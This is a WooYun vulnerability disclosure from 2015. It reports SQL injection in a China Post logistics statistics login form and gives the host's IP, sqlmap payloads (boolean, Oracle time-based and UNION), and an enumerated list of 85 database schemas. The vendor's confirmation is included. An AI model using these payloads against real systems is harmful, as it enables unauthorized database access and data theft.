当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118547

漏洞标题:中国邮政某物流统计系统SQL注入(涉及85个库大量数据)

相关厂商:中国邮政集团公司信息技术局

漏洞作者: YY-2012

提交时间:2015-06-07 12:13

修复时间:2015-07-23 10:56

公开时间:2015-07-23 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-07: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

rt

详细说明:

中国邮政速递物流统计管理系统
http://121.28.6.5:8888/LoginAction.do?actionType=quit
登录框存在sql注入。

漏洞证明:

aaaaaaaaaa1111111111111.jpg


aaaaaaaaaaa2222222222222.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: actionType=Getdw&username=admin' AND 5907=5907 AND 'sjDv'='sjDv
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: actionType=Getdw&username=admin' AND 4395=DBMS_PIPE.RECEIVE_MESSAGE
(CHR(119)||CHR(98)||CHR(68)||CHR(70),30) AND 'dbKq'='dbKq
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: actionType=Getdw&username=admin' UNION ALL SELECT CHR(113)||CHR(112
)||CHR(106)||CHR(120)||CHR(113)||CHR(115)||CHR(110)||CHR(121)||CHR(68)||CHR(112)
||CHR(98)||CHR(74)||CHR(106)||CHR(114)||CHR(109)||CHR(113)||CHR(122)||CHR(122)||
CHR(107)||CHR(113),NULL FROM DUAL--
---
[00:17:11] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
[00:17:11] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[00:17:11] [INFO] fetching database (schema) names
available databases [85]:
[*] A
[*] AHV60902
[*] AHV6_0906
[*] AHV6_0925
[*] AHV6_1001
[*] AHV6_1_0730
[*] BGGL2014
[*] CTXSYS
[*] CWGLXT
[*] CWGLXT2
[*] DBSNMP
[*] DJDC
[*] DMSYS
[*] EXFSYS
[*] FWTDZCDC
[*] FWTDZCGL
[*] FWZCDC
[*] GDZCNEW
[*] HAN2014
[*] HANV6
[*] HBSDWZ
[*] HBYHSYHS
[*] HUBV6_2
[*] JTYS2011
[*] KCGL
[*] KCGL0817
[*] MDSYS
[*] NBZTGLZY
[*] NC50
[*] NC56
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SDCWGL2013
[*] SDTJGL
[*] SDTZ
[*] SDYS2012
[*] SYHS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] TYDC
[*] TYDC0508
[*] TYDC_20120106
[*] TYDC_SDWL
[*] TYDCNEW
[*] V6_AH0221
[*] V6_JL1027
[*] WMSYS
[*] XDB
[*] YCBZ_AH0906
[*] YCBZ_AHV6
[*] YCBZ_AHV6_1
[*] YCBZ_HB
[*] YCBZ_HB0515
[*] YCBZ_HB0525
[*] YCBZ_IMG
[*] YCBZ_JLV6
[*] YCBZ_SC
[*] YCBZ_SC0406
[*] YCBZ_SHV6
[*] YCBZ_SHV60318
[*] YCBZV6_AH
[*] YHYS2011
[*] YHYS2012
[*] YHYS2013
[*] YHYS20132
[*] YHYS2014
[*] YHYS2015
[*] YHYSTEST
[*] YSDR
[*] YSGL
[*] YSGL_HLJ0316
[*] YZFXYWSY
[*] YZWD
[*] ZHSYHS
[*] ZHSYHSFT
[*] ZHSYHSFTQ
[*] ZHSYHSTEST
[*] ZTGLZY
[*] ZTGLZY2
[*] ZXJDC2
[*] ZXJDC2_2012
[*] ZXJDC2_2013
[00:17:11] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\121.28.6.5'

修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-08 10:54

厂商回复:

谢谢

最新状态:

暂无